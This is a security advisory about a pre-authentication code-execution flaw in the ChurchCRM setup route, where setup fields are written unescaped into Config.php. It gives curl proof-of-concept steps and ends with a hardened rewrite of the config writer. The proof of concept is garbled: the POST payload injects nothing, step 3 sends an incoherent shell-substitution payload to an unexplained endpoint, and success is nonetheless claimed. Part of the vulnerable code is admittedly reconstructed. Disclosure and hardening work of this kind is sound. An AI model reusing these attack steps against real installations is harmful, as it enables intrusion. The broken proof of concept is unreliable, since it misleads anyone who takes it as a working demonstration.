### Key Information

#### Vulnerability Overview

- **Vulnerability Type**: Pre-authentication Remote Code Execution (RCE)
- **Affected Product**: ChurchCRM versions

#### Vulnerable Code

Relevant lines from `setup/routes/setup.php` (the opening of the block was lost in this copy; the assignment of the parsed request body to `$SetupData` is reconstructed, with the receiver variable name assumed):

```php
// Parsed POST body of the unauthenticated setup request (receiver variable name assumed)
$SetupData = $request->getParsedBody();

// Lines 40-45: Direct string replacement with user input
$template = str_replace('[[DB_PASSWORD]]', $SetupData['DB_PASSWORD'], $template);
$template = str_replace('[[HTTP_PATH]]', $SetupData['HTTP_PATH'], $template);
$template = str_replace('[[URL]]', $SetupData['URL'], $template);

// Line 47: Write user-controlled content to executable PHP file
file_put_contents($ConfigDir . '/Config.php', $template);
```

#### Proof of Concept (PoC)

1. Access the installation wizard (no authentication required):

```bash
curl 'http://[target]/setup/'
```

2. Submit malicious payload via form parameters:

```bash
curl 'http://[target]/setup/' \
  -X POST \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -d 'DB_SERVER=www-data&DB_USER=root&DB_PASSWORD=evil'
```

3. Execute arbitrary commands:

```bash
curl 'http://[target]/cmd?whoami'
curl 'http://[target]/?some-id' \
  -F 'response=$(id|sudo tee /home/data) | gids=$(who-data) groups=$(who-data)'
```

#### Confirmation Results

- Successful payload injection and writing to `Config.php`
- Remote command execution confirmed via system commands
- Full web server user access obtained during installation window

#### Vendor Response Analysis

- Project contributors acknowledged the issue as "only applicable to new installations" and noted that the specified URL would stop working after installation.

However, this assessment does not fully consider:

- **Brief window ≠ no risk**: Even a short-lived RCE provides sufficient time for infrastructure compromise
- **No data leak ≠ no impact**: Server compromise, backdoor installation, and persistent access have significant consequences
- **Only during installation ≠ low severity**: Pre-auth RCE during the mandatory installation phase affects every new deployment

#### Mitigation/Workarounds

- **Immediate Action**: Restrict network access to the setup wizard during installation
- **Recommended Vendor Fixes**:
  - Implement input validation and sanitization for all setup form parameters
  - Use parameterized configuration generation instead of string replacement
  - Add CSRF protection and basic rate limiting to the setup endpoint
  - Consider moving sensitive configuration generation to a CLI-only tool

#### Disclosure Timeline

- 2025-09-24: Reported via GitHub Security Advisory GHSA-m8jq-j3p9-2xf3
- 2025-10-04: Project contributors responded, stating the issue "only applies to new installations"
- 2025-10-04: Reporter clarified risks of infrastructure compromise during installation window
- 2025-10-08: No further vendor response; advisory published to coordinate CVE

#### References

- [GitHub Security Advisory: GHSA-m8jq-j3p9-2xf3](#)
- [ChurchCRM Setup Route: setup/routes/setup.php](#)

#### Contact

- Reporter: uartu0@gmail.com
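#### Appendix: Hardened Configuration Generation (Added Example)

The following is an added example, not ChurchCRM's code, showing the two vendor-side fixes recommended above: allowlist validation of every setup field, and generating `Config.php` from data with `var_export()` rather than splicing raw strings into a PHP template. It assumes the parsed POST body is available as an array, assumes a `return [...]`-style config layout (ChurchCRM's real `Config.php` layout differs), and assumes that refusing to run when `Config.php` already exists is an acceptable way to close the installation window. The class name `SetupConfigWriter` and the field patterns are illustrative choices.

```php
<?php
// Added example (not ChurchCRM code): hardened generation of Config.php.
declare(strict_types=1);

final class SetupConfigWriter
{
    /**
     * Validate each setup field against a strict allowlist.
     * Structure is enforced here; encoding is handled by var_export() in render(),
     * so a password may legitimately contain quotes, backslashes or '$'.
     */
    public static function validate(array $input): array
    {
        $rules = [
            'DB_SERVER'   => '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/',   // host[:port]
            'DB_USER'     => '/^[A-Za-z0-9_\-]{1,32}$/',
            'DB_PASSWORD' => '/^[^\x00-\x1F\x7F]{0,128}$/',           // printable, bounded
            'HTTP_PATH'   => '/^\/[A-Za-z0-9_\-\/]{0,255}$/',          // e.g. /churchcrm
            'URL'         => null,                                      // checked with filter_var
        ];
        $clean = [];
        foreach ($rules as $key => $pattern) {
            if (!isset($input[$key]) || !is_string($input[$key])) {
                throw new InvalidArgumentException("Missing setup field: $key");
            }
            $value = $input[$key];
            if ($pattern === null) {
                $scheme = parse_url($value, PHP_URL_SCHEME);
                if (filter_var($value, FILTER_VALIDATE_URL) === false
                    || !in_array($scheme, ['http', 'https'], true)) {
                    throw new InvalidArgumentException("Invalid value for $key");
                }
            } elseif (!preg_match($pattern, $value)) {
                throw new InvalidArgumentException("Invalid value for $key");
            }
            $clean[$key] = $value;
        }
        return $clean;
    }

    /** Render config as PHP source; var_export() emits values as string literals, never as code. */
    public static function render(array $clean): string
    {
        return "<?php\n// Generated by setup; do not edit by hand.\n"
             . 'return ' . var_export($clean, true) . ";\n";
    }

    /** Write Config.php once, atomically, with restrictive permissions. */
    public static function write(string $configDir, array $input): string
    {
        $target = $configDir . '/Config.php';
        if (file_exists($target)) {
            // Closes the "installation window": the setup route cannot rewrite an existing config.
            throw new RuntimeException('Setup already completed; refusing to overwrite Config.php');
        }
        $source = self::render(self::validate($input));
        $tmp = $target . '.' . bin2hex(random_bytes(8)) . '.tmp';
        if (file_put_contents($tmp, $source, LOCK_EX) === false) {
            throw new RuntimeException('Unable to write configuration');
        }
        chmod($tmp, 0640);
        rename($tmp, $target);
        return $target;
    }
}

// Demonstration with constructed input (a password containing a quote, a backslash and '$'
// shows that values round-trip as data). Writes to a temp directory, not a real install.
$constructedInput = [
    'DB_SERVER'   => 'localhost:3306',
    'DB_USER'     => 'churchcrm',
    'DB_PASSWORD' => "it's \\ a $ plain value",
    'HTTP_PATH'   => '/churchcrm',
    'URL'         => 'https://example.invalid/churchcrm',
];
$dir = sys_get_temp_dir() . '/churchcrm-demo-' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
$path = SetupConfigWriter::write($dir, $constructedInput);
$loaded = require $path;                 // config comes back as the same array
assert($loaded === $constructedInput);
echo file_get_contents($path);
```

Because the generated file is built from a validated array and serialized with `var_export()`, a submitted value can only ever become a string literal inside `Config.php`; the `str_replace()` pattern in the vulnerable route has no equivalent step where attacker text is spliced directly into executable source. The exists-check and the atomic temp-file rename are the defensive complements to the network restriction listed under Immediate Action.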